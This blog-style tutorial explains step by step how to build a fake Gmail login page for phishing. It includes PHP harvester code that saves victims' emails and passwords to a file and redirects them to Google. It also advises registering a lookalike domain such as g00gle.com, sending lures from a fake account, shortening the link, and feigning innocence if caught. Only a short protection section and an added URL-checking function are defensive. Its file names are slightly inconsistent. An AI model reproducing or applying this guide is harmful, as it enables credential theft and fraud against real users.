Fake it till you make it.
What is Phishing?
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may also contain links to websites that host malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
This tutorial will explain how to create a fake login page for phishing; in this case we are going to use Gmail as an example. The same procedure can be used to make fake pages for any other website. Yahoo!, Facebook, Myspace, any website you want can be copied using this tutorial.
Step 1:
Head over to the website gmail.com. Right Click anywhere and Save the Page as an HTML file.
Step 2:
Once you have saved the login page completely, you will see an HTML file and a folder with a name something like "Email from google_files". Inside it there will be two image files, namely "google_transparent.gif" and "mail_logo.png".
Step 3:
Now we need to upload these images to any online image hosting website, for example tinypic.com, postimage.com or photobucket.com. After uploading, open each uploaded image and copy its URL.
Step 4:
Open the HTML file in any text editor like Notepad or MS Word. (You can use CTRL + F for the following.) Search for "google_transparent.gif" (without quotes) and replace it with the corresponding URL. Search for "mail_logo.png" (without quotes) and replace it with the corresponding URL.
Step 5:
In the same file, search for:
action="https://www.google.com/accounts/ServiceLoginAuth"
and replace it with:
action="http://yoursite.urlhere/login.php"
(You have to write your fake website's URL there; see Step 7 for creating it.)
Now save the file.
Step 6:
Now you need to create a PHP file called "login.php". So open up a text editor (like Notepad) and type the following (you can copy it from this pastie):
<?php
// Open the text file in append mode and add the two submitted form fields to it.
$handle = fopen("password.txt", "a");
fwrite($handle, $_POST["Email"]);
fwrite($handle, "\n");
fwrite($handle, $_POST["Passwd"]);
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
// Send the browser on to the real login page.
header("Location: https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
Now save it as login.php.
Step 7:
Open up Notepad again and save a new, empty file as "pswrds.txt" (no contents).
Now upload those three files (namely index.html, login.php and pswrds.txt) to any subdomain web hosting site. (Note: the web hosting service must support PHP.)
You can use the following sites:
110mb.com
spam.com
justfree.com
007sites.com
(or simply google it).
Follow the instructions on the web hosting site and set up your fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious. (Just make sure the URL doesn't stand out in the address bar, as it may alert the victim.)
Step 8:
Create a fake email account, that is, if you prefer to send the phishing webpage link anonymously.
Step 9:
And now all you have to do is send the victim something like "Gmail starts new feature: To use this service, log in to this page", along with the link to your fake website.
Note: To make the user believe the URL, shorten your phishing web page's URL with any of the free short-URL sites like co.nr, co.cc or cz.cc.
This will make users believe that it is the correct URL.
Nevertheless, if you do get caught, act like you had no clue: "OMG! I logged in to that website too, I'm going to change my pass now! You do the same, quickly!"
Protecting Yourself:
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide by simply peeking at the address bar in your web browser. Also, avoid following any links from any dodgy websites, scam emails or even the comment sections in various places.
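As an added defensive example (not part of the original post), the address-bar check described above written as a small Python function: it classifies a login URL against an assumed allowlist of legitimate hosts and flags the digit-for-letter lookalikes (g00gle.com), the "real domain as a subdomain of another host" trick, and plain-http form targets that this page relies on. The host names in the allowlist are assumptions for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist of legitimate login hosts (assumption for this example).
TRUSTED_HOSTS = {"accounts.google.com", "mail.google.com", "www.google.com"}

# Digits commonly swapped in for letters in lookalike domain names.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def hostname(url: str) -> str:
    """Return the lowercased host part of a URL, tolerating a missing scheme."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return (parts.hostname or "").lower().rstrip(".")


def check_login_url(url: str) -> str:
    """Classify where a login form would send credentials.

    Returns one of:
      "trusted"   - host is on the allowlist and uses https
      "insecure"  - host is on the allowlist but the form target is not https
      "lookalike" - host imitates a trusted name (confusable characters or
                    the trusted name buried in a longer host name)
      "untrusted" - anything else
    """
    host = hostname(url)
    if host in TRUSTED_HOSTS:
        return "trusted" if urlsplit(url).scheme == "https" else "insecure"

    # Undo digit-for-letter substitutions, then look for the trusted
    # registered name anywhere in the host (catches g00gle.com and
    # accounts.google.com.something-else.example alike).
    normalized = host.translate(CONFUSABLES)
    for trusted in TRUSTED_HOSTS:
        registered_name = trusted.split(".")[-2]  # e.g. "google"
        if registered_name in normalized:
            return "lookalike"
    return "untrusted"
```

The same check applies to a short URL only after it has been resolved, because the shortener's host tells you nothing about the final destination.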
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.
*EDIT: This method currently does not work. At the time of writing, the files we uploaded to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the login page almost every other week, causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names, you may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.